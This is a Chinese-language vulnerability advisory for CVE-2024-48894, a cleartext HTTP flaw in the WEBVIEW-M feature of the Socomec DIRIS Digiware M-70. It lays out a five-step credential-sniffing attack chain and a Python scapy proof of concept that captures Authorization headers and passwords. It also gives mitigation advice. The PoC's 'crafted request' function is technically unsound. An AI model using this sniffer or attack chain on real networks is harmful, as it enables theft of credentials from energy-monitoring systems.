CVE-2024-48894 Socomec DIRIS Digiware M-70 明文传输敏感信息漏洞

漏洞信息

漏洞编号

CVE-2024-48894

漏洞类型

明文传输敏感信息

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Socomec DIRIS Digiware M-70 1.6.9

漏洞概述

CVE-2024-48894是Socomec公司DIRIS Digiware M-70设备1.6.9版本中的一个中等严重性安全漏洞。该漏洞存在于WEBVIEW-M功能模块中，由于网络通信采用明文传输方式，导致敏感信息在传输过程中容易被窃取。攻击者可以通过网络嗅探的方式捕获通信流量，进而获取设备传输的敏感数据，包括但不限于认证凭据、配置信息、设备状态等。明文传输漏洞是网络安全领域中常见但危害严重的问题，尤其在工业控制系统和关键基础设施设备中更为突出。DIRIS Digiware系列设备广泛应用于电力监控和能源管理系统中，一旦发生敏感信息泄露，可能对企业的生产安全和数据保护造成严重影响。该漏洞无需认证即可利用，且不需要用户交互，降低了攻击门槛，增加了实际风险。

技术细节

该漏洞的根本原因在于Socomec DIRIS Digiware M-70设备的WEBVIEW-M功能在处理HTTP请求和响应时，未对传输数据进行加密处理。设备在网络通信过程中直接以明文形式发送和接收敏感信息，包括用户认证凭据、会话标识符、设备配置参数等关键数据。攻击者只需在网络路径上部署流量监控工具（如Wireshark、tcpdump等），即可捕获并分析这些明文传输的数据包。具体来说，当用户通过WEBVIEW-M功能访问设备管理界面或执行敏感操作时，用户名、密码、IP地址配置、电力参数等敏感信息都会被以明文HTTP请求/响应的形式传输。攻击者可以利用捕获的认证凭据进行后续的未授权访问，或者直接提取设备配置信息用于进一步的攻击。由于该漏洞位于设备的核心通信模块，理论上影响所有使用WEBVIEW-M功能进行远程管理和监控的场景。攻击者可以通过中间人攻击（MITM）或简单的网络嗅探来触发此漏洞。

攻击链分析

STEP 1

步骤1

攻击者部署网络流量监控工具（如Wireshark、tcpdump），在DIRIS Digiware M-70设备所在的网络段进行流量嗅探

STEP 2

步骤2

等待合法用户通过WEBVIEW-M功能访问设备管理界面或执行远程监控操作

STEP 3

步骤3

捕获设备与客户端之间传输的明文HTTP流量，包括认证凭据、会话信息、设备配置参数等敏感数据

STEP 4

步骤4

分析捕获的数据包，提取明文传输的用户名、密码、IP地址配置、电力监控数据等敏感信息

STEP 5

步骤5

利用提取的认证凭据进行后续未授权访问，或将窃取的配置信息用于更深入的定向攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2024-48894 PoC - Cleartext Transmission in Socomec DIRIS Digiware WEBVIEW-M
# This PoC demonstrates sniffing network traffic to capture sensitive information
# Note: This is for educational and authorized testing purposes only

import scapy.all as scapy
from scapy.layers import http

def capture_cleartext_http_traffic(packet):
    """
    Capture cleartext HTTP traffic from Socomec DIRIS Digiware M-70
    This PoC demonstrates how sensitive information can be sniffed
    """
    # Check if packet contains HTTP layer
    if packet.haslayer(http.HTTPRequest):
        http_layer = packet.getlayer(http.HTTPRequest)
        
        # Log HTTP request details
        print(f"[+] HTTP Request Detected")
        print(f"    Method: {http_layer.Method.decode()}")
        print(f"    Host: {http_layer.Host.decode()}")
        print(f"    Path: {http_layer.Path.decode()}")
        
        # Check for Authorization header (potential credentials)
        if packet.haslayer(scapy.Raw):
            payload = packet.getlayer(scapy.Raw).load
            try:
                decoded_payload = payload.decode('utf-8', errors='ignore')
                if 'Authorization' in decoded_payload or 'password' in decoded_payload.lower():
                    print(f"[!] POTENTIAL SENSITIVE DATA FOUND:")
                    print(decoded_payload[:500])
            except:
                pass

def start_sniffing(interface='eth0', count=100):
    """
    Start packet sniffing on specified interface
    Args:
        interface: Network interface to sniff on
        count: Number of packets to capture
    """
    print(f"[*] Starting packet capture on {interface}")
    print(f"[*] Watching for cleartext HTTP traffic to DIRIS Digiware")
    
    # Filter for HTTP traffic (port 80)
    scapy.sniff(iface=interface, count=count, 
                prn=capture_cleartext_http_traffic,
                filter='tcp port 80')

# Example: Send crafted HTTP request to trigger vulnerability
def send_crafted_request(target_ip):
    """
    Send crafted HTTP request to WEBVIEW-M endpoint
    """
    from scapy.all import IP, TCP, Raw, send
    
    # Craft HTTP GET request to WEBVIEW-M
    http_request = b"GET /webview-m/api/status HTTP/1.1\r\nHost: "
    http_request += target_ip.encode()
    http_request += b"\r\nAuthorization: Basic dXNlcjpwYXNz\r\n"
    http_request += b"Connection: close\r\n\r\n"
    
    # Send packet
    ip_layer = IP(dst=target_ip)
    tcp_layer = TCP(dport=80, sport=12345, flags='PA')
    packet = ip_layer / tcp_layer / Raw(load=http_request)
    
    print(f"[*] Sending crafted request to {target_ip}")
    send(packet, verbose=0)

if __name__ == "__main__":
    # Replace with actual target IP
    TARGET_IP = "192.168.1.100"
    
    # Option 1: Capture existing traffic
    # start_sniffing(interface="eth0", count=1000)
    
    # Option 2: Send crafted request
    # send_crafted_request(TARGET_IP)
    
    print("CVE-2024-48894 PoC - Cleartext Transmission")
    print("Target: Socomec DIRIS Digiware M-70 WEBVIEW-M")

影响范围

Socomec DIRIS Digiware M-70 < 1.6.9

Socomec DIRIS Digiware M-70 1.6.9 (affected)

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1) 使用VPN或SSH隧道访问DIRIS Digiware设备，避免直接通过明文HTTP通信；2) 在网络边界部署入侵检测系统（IDS），监控异常的网络流量模式；3) 限制WEBVIEW-M功能的网络访问范围，仅允许受信任的管理网段访问；4) 定期审计设备访问日志，及时发现可疑的网络嗅探行为；5) 考虑使用网络访问控制（NAC）解决方案，防止未授权设备接入关键网络段；6) 监控DNS和ARP流量，检测可能的中间人攻击。